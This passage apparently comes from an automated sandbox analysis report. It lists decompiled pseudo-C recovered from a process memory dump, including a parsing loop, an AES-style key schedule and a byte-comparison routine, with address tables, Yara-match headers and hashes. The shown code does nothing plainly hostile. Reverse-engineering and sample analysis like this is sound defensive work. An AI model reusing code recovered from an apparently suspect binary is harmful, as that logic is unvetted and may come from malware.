                              								if((_v34 & 0x00000002) == 0) {
                              									_v34 = _v34 & 0x0000fffe;
                              									goto L64;
                              								} else {
                              									_t486 = _v40;
                              									_t449 = 1;
                              									_v34 = _v34 | 1;
                              									goto L65;
                              								}
                              							} else {
                              								do {
                              									_v44 = _v48 - 1;
                              									_t318 = E0041A2E3(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
                              									_t493 = _t493 + 0x10;
                              									if(_t318 == 0) {
                              										_t318 = E0041A3C0(_t375,  &_v72);
                              									}
                              									_t486 = E0041A146( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t318,  &_v72);
                              									_t321 =  *(_t375 + 0x308) & 0x00000080;
                              									if(_t321 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
                              										 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
                              										_t486 = 0;
                              									}
                              									_t482 = _v64;
                              									if(_t486 != 0) {
                              										L45:
                              										if(( *(_t375 + 0x308) & 0x00000080) == 0) {
                              											E0041A0E7(_t375, _t486);
                              										}
                              										 *(_t375 + 0x1f0) = _t486;
                              										if(_v40 == 0) {
                              											_v40 = _t486;
                              											_t486 = 0;
                              										}
                              										goto L49;
                              									}
                              									if(( *(_t482 + 0x36c) & 0x00000010) != 0 && _t321 == 0 && _v24 == 0) {
                              										_v20 = _v20 & 0x00000000;
                              										_t486 = L00425FF8( &_v20,  *((intOrPtr*)(_v72 + 4 + _v44 * 8)), 5,  *((intOrPtr*)(_t375 + 0x84)));
                              										if(_t486 < 0) {
                              											goto L120;
                              										}
                              										L00431DF0( *_v20,  *((intOrPtr*)(_v72 + _v44 * 8)),  *((intOrPtr*)(_v72 + 4 + _v44 * 8)));
                              										_t493 = _t493 + 0xc;
                              										_t486 =  ==  ? 0 : L0041C49B( *((intOrPtr*)( *_t375 + 0x50)),  &_v20, 2, 0);
                              										if(_t486 == 0) {
                              											goto L49;
                              										}
                              										goto L45;
                              									}
                              									L49:
                              									_t387 = _t482;
                              									L00423BB3(_t482);
                              									_v34 = _v34 & 0x0000fffb;
                              									_t447 = 1;
                              									_t326 = _v48 - 1;
                              									_v48 = _t326;
                              								} while (_t326 > 1);
                              								goto L50;
                              							}
                              						}
                              						if(( *(_t375 + 0x30c) & 0x00002000) != 0) {
                              							L28:
                              							if(( *(_t375 + 0x308) & 0x00000030) == 0) {
                              								_t486 = 0xfffffea7;
                              								E0041A0E7(_t375, 0xfffffea7);
                              							}
                              							goto L30;
                              						}
                              						if(( *(_t375 + 0x308) & 0x00000100) == 0) {
                              							goto L30;
                              						}
                              						_t338 = L00418A14( *(_t375 + 0x218) & 0x0000ffff);
                              						_t492 = _t492 + 4;
                              						if(_t338 == 0) {
                              							goto L30;
                              						}
                              						goto L28;
                              					}
                              					L14:
                              					if(_t385 >= ( *(_t375 + 0x20e) & 0x000000ff) || _t385 >= 9) {
                              						_t486 = 0xfffffe90;
                              					} else {
                              						goto L16;
                              					}
                              					goto L120;
                              					L16:
                              					if(_t481 - _t445 + 3 > _a8) {
                              						goto L2;
                              					}
                              					L004189B4(_t481 + _v12,  &_v20);
                              					_t483 = _t481 + 3;
                              					_v60 = _t483;
                              					if(_v20 - _v56 + _t483 > _a8) {
                              						goto L2;
                              					}
                              					_t436 = _v52;
                              					 *((intOrPtr*)(_v72 + 4 + _t436 * 8)) = _v20;
                              					_t481 = _t483 + _v20;
                              					_v60 = _t481;
                              					 *((intOrPtr*)(_v72 + _t436 * 8)) = _v12 + _t483;
                              					_t445 = _v56;
                              					_t350 = 0xfffffffd;
                              					_v16 = _v16 + _t350 - _v20;
                              					if( *(_t375 + 0x308) < 0x8000) {
                              						L23:
                              						_t385 = _t436 + 1;
                              						_v52 = _t385;
                              						if(_v16 != 0) {
                              							goto L14;
                              						}
                              						goto L24;
                              					}
                              					if(_t481 - _t445 + 2 > _a8) {
                              						goto L2;
                              					}
                              					_t488 = _v12;
                              					L004189CE(_t481 + _t488,  &_v8);
                              					_t484 = _t481 + 2;
                              					_v60 = _t484;
                              					if((_v8 & 0x0000ffff) - _v56 + _t484 > _a8) {
                              						goto L2;
                              					}
                              					_t438 = _v52;
                              					_t475 = _v68;
                              					 *(_t475 + 4 + _t438 * 8) = _v8 & 0x0000ffff;
                              					_t489 = _v8 & 0x0000ffff;
                              					 *((intOrPtr*)(_t475 + _t438 * 8)) = _t484 + _t488;
                              					_t481 = _t484 + _t489;
                              					_t362 = 0xfffffffe;
                              					_v60 = _t481;
                              					_v16 = _v16 + _t362 - _t489;
                              					_t486 = L0041EF4B(_t375,  *((intOrPtr*)(_t475 + _t438 * 8)), _t497,  *(_t475 + 4 + _t438 * 8) & 0x0000ffff, 0xb, 0);
                              					_t492 = _t492 + 0xc;
                              					if(_t486 < 0) {
                              						goto L120;
                              					} else {
                              						_t436 = _v52;
                              						_t445 = _v56;
                              						goto L23;
                              					}
                              				}
                              				if(_t480 - _t379 + 1 <= _a8) {
                              					_t370 =  *((intOrPtr*)(_t480 + _v12));
                              					_t485 = _t480 + 1;
                              					_v7 = _t370;
                              					_t371 = _t370 & 0x000000ff;
                              					_v20 = _t371;
                              					_v60 = _t485;
                              					if(_t371 - _t379 + _t485 > _a8) {
                              						goto L2;
                              					}
                              					if((_t442 & 0x00000030) != 0x10 || _v7 == 0) {
                              						_t480 = _t485 + _v20;
                              						_push(0x48);
                              						_v60 = _t480;
                              						_t374 = L0042D5FA();
                              						_v68 = _t374;
                              						if(_t374 != 0) {
                              							goto L9;
                              						}
                              						goto L8;
                              					} else {
                              						_t486 = 0xfffffe5c;
                              						goto L120;
                              					}
                              				}
                              				goto L2;
                              			}

                              0x0041a66e
                              0x0041a677
                              0x0041a677
                              0x00000000
                              0x0041a66c
                              0x0041a64f
                              0x00000000
                              0x00000000
                              0x0041a659
                              0x0041a65e
                              0x0041a663
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a663
                              0x00000000
                              0x0041a511
                              0x0041a51a
                              0x0041a877
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a529
                              0x0041a533
                              0x00000000
                              0x00000000
                              0x0041a542
                              0x0041a54a
                              0x0041a552
                              0x0041a558
                              0x00000000
                              0x00000000
                              0x0041a55e
                              0x0041a569
                              0x0041a575
                              0x0041a578
                              0x0041a57b
                              0x0041a57e
                              0x0041a581
                              0x0041a585
                              0x0041a594
                              0x0041a61c
                              0x0041a61c
                              0x0041a621
                              0x0041a624
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a624
                              0x0041a5a4
                              0x00000000
                              0x00000000
                              0x0041a5aa
                              0x0041a5b3
                              0x0041a5bc
                              0x0041a5c4
                              0x0041a5ca
                              0x00000000
                              0x00000000
                              0x0041a5d0
                              0x0041a5d3
                              0x0041a5dc
                              0x0041a5e3
                              0x0041a5e7
                              0x0041a5ea
                              0x0041a5ec
                              0x0041a5ef
                              0x0041a5f2
                              0x0041a609
                              0x0041a60b
                              0x0041a610
                              0x00000000
                              0x0041a616
                              0x0041a616
                              0x0041a619
                              0x00000000
                              0x0041a619
                              0x0041a610
                              0x0041a444
                              0x0041a453
                              0x0041a456
                              0x0041a457
                              0x0041a45a
                              0x0041a45d
                              0x0041a464
                              0x0041a46a
                              0x00000000
                              0x00000000
                              0x0041a472
                              0x0041a484
                              0x0041a487
                              0x0041a48a
                              0x0041a48d
                              0x0041a492
                              0x0041a497
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041a47a
                              0x0041a47a
                              0x00000000
                              0x0041a47a
                              0x0041a472
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2f124d830bc3c61cdf6e8695b7cf3497e9befc8d3840a918b6d32a3028062dc
                              • Instruction ID: 3ba6e254b7f2d4c2766406d12400661e9b1fdfca9830f8b749eaf033f3ce6608
                              • Opcode Fuzzy Hash: b2f124d830bc3c61cdf6e8695b7cf3497e9befc8d3840a918b6d32a3028062dc
                              • Instruction Fuzzy Hash: 3222F331A022099BCF15CF68C4807FEB7B5AF44314F18816BEC559B382D7389E91CB9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 99%
                              			E0042220F(signed int* __ecx, void* __edx, unsigned int _a4, intOrPtr _a8, intOrPtr _a12) {
                              				signed int* _v8;
                              				signed int _t250;
                              				signed int _t267;
                              				void* _t270;
                              				intOrPtr _t314;
                              				signed int _t330;
                              				signed int _t351;
                              				signed int _t369;
                              				signed int _t387;
                              				signed int _t406;
                              				signed int _t413;
                              				signed char* _t414;
                              				signed int _t425;
                              				signed int _t427;
                              				signed int _t431;
                              				intOrPtr _t455;
                              				signed int _t459;
                              				signed int _t461;
                              				signed int _t464;
                              				signed int _t467;
                              				signed int _t469;
                              				signed int _t470;
                              				signed int _t473;
                              				signed int _t476;
                              				signed int _t482;
                              				intOrPtr* _t493;
                              				signed int _t500;
                              				signed int _t506;
                              				signed int _t513;
                              				signed int _t519;
                              				signed int _t525;
                              				unsigned int _t527;
                              				signed int* _t528;
                              				void* _t530;
                              				intOrPtr* _t532;
                              				signed int* _t534;
                              				signed int* _t535;
                              				signed int* _t537;
                              				void* _t538;
                              				intOrPtr _t539;
                              				void* _t541;
                              				void* _t542;
                              				void* _t543;
                              
                              				_push(__ecx);
                              				_t527 = _a4;
                              				_t537 = __ecx;
                              				_v8 = __ecx;
                              				 *(__ecx + 0xf4) = _t527;
                              				 *((intOrPtr*)(__ecx + 0xf0)) = (_t527 >> 2) + 6;
                              				L00431DF0(__ecx, __edx, _t527);
                              				L00421C07(_t537, _t537, _t527);
                              				if(_t527 == 0x10) {
                              					_t476 = _t537[3];
                              					_t528 =  &(_t537[1]);
                              					_t425 = ( *(0x4621e8 + (_t476 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t476 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t476 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
                              					_t537[4] = _t425;
                              					_t250 =  *_t528 ^ _t425;
                              					_t427 = _t537[2] ^ _t250;
                              					_t537[5] = _t250;
                              					_t537[6] = _t427;
                              					_t537[7] = _t427 ^ _t476;
                              					_t538 = 4;
                              					do {
                              						_t528 =  &(_t528[4]);
                              						_t429 = _t528[2];
                              						_t122 = _t538 + 0x4609bc; // 0x2000000
                              						_t538 = _t538 + 4;
                              						_t482 =  *(0x461de8 + (_t528[2] >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t528[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t429 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t528 - 4);
                              						_t528[3] = _t482;
                              						_t267 =  *_t528 ^ _t482;
                              						_t528[4] = _t267;
                              						_t431 = _t528[1] ^ _t267;
                              						_t528[5] = _t431;
                              						_t528[6] = _t528[2] ^ _t431;
                              					} while (_t538 != 0x28);
                              					goto L12;
                              				} else {
                              					if(_t527 == 0x18) {
                              						_t457 = _t537[5];
                              						_t534 =  &(_t537[0xa]);
                              						_t500 = ( *(0x4621e8 + (_t537[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t457 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t457 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t457 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
                              						_t330 = _t537[1] ^ _t500;
                              						_t537[6] = _t500;
                              						_t537[7] = _t330;
                              						_t459 = _t537[2] ^ _t330;
                              						_t537[8] = _t459;
                              						_t537[9] = _t537[3] ^ _t459;
                              						_t542 = 4;
                              						do {
                              							_t461 =  *(_t534 - 0x18) ^  *(_t534 - 4);
                              							 *_t534 = _t461;
                              							_t534[1] =  *(_t534 - 0x14) ^ _t461;
                              							_t534 =  &(_t534[6]);
                              							_t462 =  *(_t534 - 0x14);
                              							_t88 = _t542 + 0x4609bc; // 0x2000000
                              							_t542 = _t542 + 4;
                              							_t506 =  *(0x461de8 + ( *(_t534 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + ( *(_t534 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t462 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t534 - 0x28);
                              							 *(_t534 - 0x10) = _t506;
                              							_t351 =  *(_t534 - 0x24) ^ _t506;
                              							 *(_t534 - 0xc) = _t351;
                              							_t464 =  *(_t534 - 0x20) ^ _t351;
                              							 *(_t534 - 8) = _t464;
                              							 *(_t534 - 4) =  *(_t534 - 0x1c) ^ _t464;
                              						} while (_t542 != 0x20);
                              						goto L12;
                              					} else {
                              						if(_t527 == 0x20) {
                              							_t465 = _t537[7];
                              							_t535 =  &(_t537[0xc]);
                              							_t513 = ( *(0x4621e8 + (_t537[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461de8 + (_t465 >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + (_t465 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4619e8 + (_t465 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
                              							_t369 = _t537[1] ^ _t513;
                              							_t537[8] = _t513;
                              							_t537[9] = _t369;
                              							_t467 = _t537[2] ^ _t369;
                              							_t537[0xa] = _t467;
                              							_t537[0xb] = _t537[3] ^ _t467;
                              							_t543 = 4;
                              							do {
                              								_t468 =  *(_t535 - 4);
                              								_t469 =  *(_t535 - 0x18);
                              								_t519 =  *(0x4625e8 + ( *(_t535 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + ( *(_t535 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x4619e8 + (_t468 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461de8 + (_t468 & 0x000000ff) * 4) & 0x000000ff ^  *(_t535 - 0x20);
                              								_t387 =  *(_t535 - 0x1c) ^ _t519;
                              								 *_t535 = _t519;
                              								_t535[1] = _t387;
                              								_t535 =  &(_t535[8]);
                              								_t470 = _t469 ^ _t387;
                              								 *(_t535 - 0x18) = _t470;
                              								 *(_t535 - 0x14) =  *(_t535 - 0x34) ^ _t470;
                              								_t471 =  *(_t535 - 0x14);
                              								_t48 = _t543 + 0x4609bc; // 0x2000000
                              								_t543 = _t543 + 4;
                              								_t525 =  *(0x461de8 + ( *(_t535 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x4625e8 + ( *(_t535 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x4621e8 + (_t471 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x4619e8 + (_t471 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t535 - 0x30);
                              								 *(_t535 - 0x10) = _t525;
                              								_t406 =  *(_t535 - 0x2c) ^ _t525;
                              								 *(_t535 - 0xc) = _t406;
                              								_t473 =  *(_t535 - 0x28) ^ _t406;
                              								 *(_t535 - 8) = _t473;
                              								 *(_t535 - 4) =  *(_t535 - 0x24) ^ _t473;
                              							} while (_t543 != 0x1c);
                              							L12:
                              							_t539 = _v8;
                              							_t530 = 1;
                              							if(_a12 == 1) {
                              								_t413 =  *(_t539 + 0xf0) << 2;
                              								if(_t413 != 0) {
                              									_t493 = _t539 + (_t413 + 2) * 4;
                              									_t532 = _t539 + 8;
                              									_t541 = 0;
                              									do {
                              										_t541 = _t541 + 4;
                              										_t413 = _t413 - 4;
                              										 *((intOrPtr*)(_t532 - 8)) =  *((intOrPtr*)(_t493 - 8));
                              										 *((intOrPtr*)(_t493 - 8)) =  *((intOrPtr*)(_t532 - 8));
                              										 *((intOrPtr*)(_t532 - 4)) =  *((intOrPtr*)(_t493 - 4));
                              										 *((intOrPtr*)(_t493 - 4)) =  *((intOrPtr*)(_t532 - 4));
                              										_t455 =  *_t532;
                              										 *_t532 =  *_t493;
                              										_t532 = _t532 + 0x10;
                              										_t314 =  *((intOrPtr*)(_t493 + 4));
                              										 *_t493 = _t455;
                              										_t493 = _t493 - 0x10;
                              										 *((intOrPtr*)(_t532 - 0xc)) = _t314;
                              										 *((intOrPtr*)(_t493 + 0x14)) =  *((intOrPtr*)(_t532 - 0xc));
                              									} while (_t541 < _t413);
                              									_t539 = _v8;
                              									_t530 = 1;
                              								}
                              								if( *(_t539 + 0xf0) > _t530) {
                              									_t414 = _t539 + 8;
                              									do {
                              										_t414 =  &(_t414[0x10]);
                              										_t484 =  *(_t414 - 8);
                              										_t486 =  *(_t414 - 4);
                              										 *(_t414 - 8) =  *(0x4609e8 + ( *(0x461de8 + ( *(_t414 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *(_t414 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t484 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *(_t414 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
                              										_t488 =  *_t414;
                              										 *(_t414 - 4) =  *(0x4609e8 + ( *(0x461de8 + ( *(_t414 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *(_t414 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t486 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *(_t414 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
                              										_t490 = _t414[4];
                              										 *_t414 =  *(0x4609e8 + ( *(0x461de8 + ( *_t414 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + ( *_t414 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t488 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + ( *_t414 & 0x000000ff) * 4) & 0x000000ff) * 4);
                              										_t530 = _t530 + 1;
                              										_t414[4] =  *(0x4609e8 + ( *(0x461de8 + (_t414[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460de8 + ( *(0x461de8 + (_t414[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4611e8 + ( *(0x461de8 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x4615e8 + ( *(0x461de8 + (_t414[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
                              									} while (_t530 <  *(_t539 + 0xf0));
                              								}
                              							}
                              							_t270 = L00422806(_t539, _a8);
                              						} else {
                              							_t270 = 0xffffff53;
                              						}
                              					}
                              				}
                              				return _t270;
                              			}
                              0x00422212
                              0x00422216
                              0x00422219
                              0x0042221d
                              0x00422228
                              0x0042222f
                              0x00422235
                              0x0042223f
                              0x0042224a
                              0x004224d4
                              0x004224d7
                              0x00422530
                              0x00422532
                              0x00422535
                              0x0042253a
                              0x0042253c
                              0x0042253f
                              0x00422544
                              0x00422547
                              0x00422548
                              0x00422548
                              0x0042254b
                              0x00422595
                              0x0042259b
                              0x0042259e
                              0x004225a1
                              0x004225a6
                              0x004225a8
                              0x004225ae
                              0x004225b0
                              0x004225b8
                              0x004225bb
                              0x00000000
                              0x00422250
                              0x00422253
                              0x004223ca
                              0x004223cd
                              0x0042242a
                              0x0042242c
                              0x0042242e
                              0x00422431
                              0x00422434
                              0x0042243b
                              0x0042243e
                              0x00422441
                              0x00422442
                              0x00422445
                              0x0042244d
                              0x0042244f
                              0x00422452
                              0x00422455
                              0x0042249f
                              0x004224a5
                              0x004224a8
                              0x004224ab
                              0x004224b1
                              0x004224b3
                              0x004224b9
                              0x004224bb
                              0x004224c3
                              0x004224c6
                              0x00000000
                              0x00422259
                              0x0042225c
                              0x00422268
                              0x0042226b
                              0x004222c8
                              0x004222ca
                              0x004222cc
                              0x004222cf
                              0x004222d2
                              0x004222d9
                              0x004222dc
                              0x004222df
                              0x004222e0
                              0x004222e0
                              0x00422321
                              0x00422331
                              0x00422334
                              0x00422336
                              0x00422338
                              0x0042233b
                              0x0042233e
                              0x00422345
                              0x00422348
                              0x0042234b
                              0x00422395
                              0x0042239b
                              0x0042239e
                              0x004223a1
                              0x004223a7
                              0x004223a9
                              0x004223af
                              0x004223b1
                              0x004223b9
                              0x004223bc
                              0x004225c0
                              0x004225c0
                              0x004225c5
                              0x004225c9
                              0x004225d5
                              0x004225da
                              0x004225df
                              0x004225e2
                              0x004225e5
                              0x004225e7
                              0x004225ea
                              0x004225f0
                              0x004225f3
                              0x004225f9
                              0x004225ff
                              0x00422604
                              0x00422607
                              0x00422609
                              0x0042260b
                              0x0042260e
                              0x00422611
                              0x00422613
                              0x00422619
                              0x0042261c
                              0x0042261f
                              0x00422623
                              0x00422628
                              0x00422628
                              0x0042262f
                              0x00422635
                              0x00422638
                              0x00422638
                              0x0042263b
                              0x0042266f
                              0x00422699
                              0x004226c8
                              0x004226f1
                              0x00422720
                              0x00422749
                              0x00422799
                              0x0042279a
                              0x0042279d
                              0x00422638
                              0x0042262f
                              0x004227ae
                              0x0042225e
                              0x0042225e
                              0x0042225e
                              0x0042225c
                              0x00422253
                              0x004227b9

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6dcb447a85b1182a68abc09f72ac54cd806021c874cec78a4556c29f23593adf
                              • Instruction ID: 73839bb05d6e719aa0e6431676c5ad9225ade293482c4aaa0957e560a066960c
                              • Opcode Fuzzy Hash: 6dcb447a85b1182a68abc09f72ac54cd806021c874cec78a4556c29f23593adf
                              • Instruction Fuzzy Hash: 6B029F716005518FC358CF2EEC9056AB7E1EF8E301748853AE486C73A5EB74E922DF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0043424F(void* __edx, void* __esi) {
                              				signed int _t197;
                              				signed char _t198;
                              				signed char _t199;
                              				signed char _t200;
                              				signed char _t202;
                              				signed char _t203;
                              				signed int _t246;
                              				void* _t294;
                              				void* _t297;
                              				void* _t299;
                              				void* _t301;
                              				void* _t303;
                              				void* _t305;
                              				void* _t307;
                              				void* _t309;
                              				void* _t311;
                              				void* _t313;
                              				void* _t315;
                              				void* _t317;
                              				void* _t319;
                              				void* _t321;
                              				void* _t323;
                              				void* _t325;
                              				void* _t327;
                              				void* _t329;
                              				void* _t331;
                              				void* _t333;
                              				void* _t335;
                              				void* _t336;
                              
                              				_t336 = __esi;
                              				_t294 = __edx;
                              				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                              					_t246 = 0;
                              					L14:
                              					if(_t246 != 0) {
                              						goto L1;
                              					}
                              					_t198 =  *(_t336 - 0x1b);
                              					if(_t198 ==  *(_t294 - 0x1b)) {
                              						_t246 = 0;
                              						L25:
                              						if(_t246 != 0) {
                              							goto L1;
                              						}
                              						_t199 =  *(_t336 - 0x17);
                              						if(_t199 ==  *(_t294 - 0x17)) {
                              							_t246 = 0;
                              							L36:
                              							if(_t246 != 0) {
                              								goto L1;
                              							}
                              							_t200 =  *(_t336 - 0x13);
                              							if(_t200 ==  *(_t294 - 0x13)) {
                              								_t246 = 0;
                              								L47:
                              								if(_t246 != 0) {
                              									goto L1;
                              								}
                              								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                              									_t246 = 0;
                              									L58:
                              									if(_t246 != 0) {
                              										goto L1;
                              									}
                              									_t202 =  *(_t336 - 0xb);
                              									if(_t202 ==  *(_t294 - 0xb)) {
                              										_t246 = 0;
                              										L69:
                              										if(_t246 != 0) {
                              											goto L1;
                              										}
                              										_t203 =  *(_t336 - 7);
                              										if(_t203 ==  *(_t294 - 7)) {
                              											_t246 = 0;
                              											L80:
                              											if(_t246 != 0) {
                              												goto L1;
                              											}
                              											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                              											if(_t297 == 0) {
                              												L83:
                              												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                              												if(_t299 == 0) {
                              													L3:
                              													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                              													if(_t246 != 0) {
                              														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              													}
                              													goto L1;
                              												}
                              												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                              												if(_t246 != 0) {
                              													goto L1;
                              												} else {
                              													goto L3;
                              												}
                              											}
                              											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                              											if(_t246 != 0) {
                              												goto L1;
                              											}
                              											goto L83;
                              										}
                              										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                              										if(_t301 == 0) {
                              											L73:
                              											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                              											if(_t303 == 0) {
                              												L75:
                              												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                              												if(_t305 == 0) {
                              													L77:
                              													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                              													if(_t246 != 0) {
                              														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              													}
                              													goto L80;
                              												}
                              												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                              												if(_t246 != 0) {
                              													goto L1;
                              												}
                              												goto L77;
                              											}
                              											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                              											if(_t246 != 0) {
                              												goto L1;
                              											}
                              											goto L75;
                              										}
                              										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                              										if(_t246 != 0) {
                              											goto L1;
                              										}
                              										goto L73;
                              									}
                              									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                              									if(_t307 == 0) {
                              										L62:
                              										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                              										if(_t309 == 0) {
                              											L64:
                              											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                              											if(_t311 == 0) {
                              												L66:
                              												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                              												if(_t246 != 0) {
                              													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              												}
                              												goto L69;
                              											}
                              											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                              											if(_t246 != 0) {
                              												goto L1;
                              											}
                              											goto L66;
                              										}
                              										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                              										if(_t246 != 0) {
                              											goto L1;
                              										}
                              										goto L64;
                              									}
                              									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                              									if(_t246 != 0) {
                              										goto L1;
                              									}
                              									goto L62;
                              								}
                              								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                              								if(_t313 == 0) {
                              									L51:
                              									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                              									if(_t315 == 0) {
                              										L53:
                              										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                              										if(_t317 == 0) {
                              											L55:
                              											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                              											if(_t246 != 0) {
                              												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              											}
                              											goto L58;
                              										}
                              										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                              										if(_t246 != 0) {
                              											goto L1;
                              										}
                              										goto L55;
                              									}
                              									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                              									if(_t246 != 0) {
                              										goto L1;
                              									}
                              									goto L53;
                              								}
                              								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                              								if(_t246 != 0) {
                              									goto L1;
                              								}
                              								goto L51;
                              							}
                              							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                              							if(_t319 == 0) {
                              								L40:
                              								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                              								if(_t321 == 0) {
                              									L42:
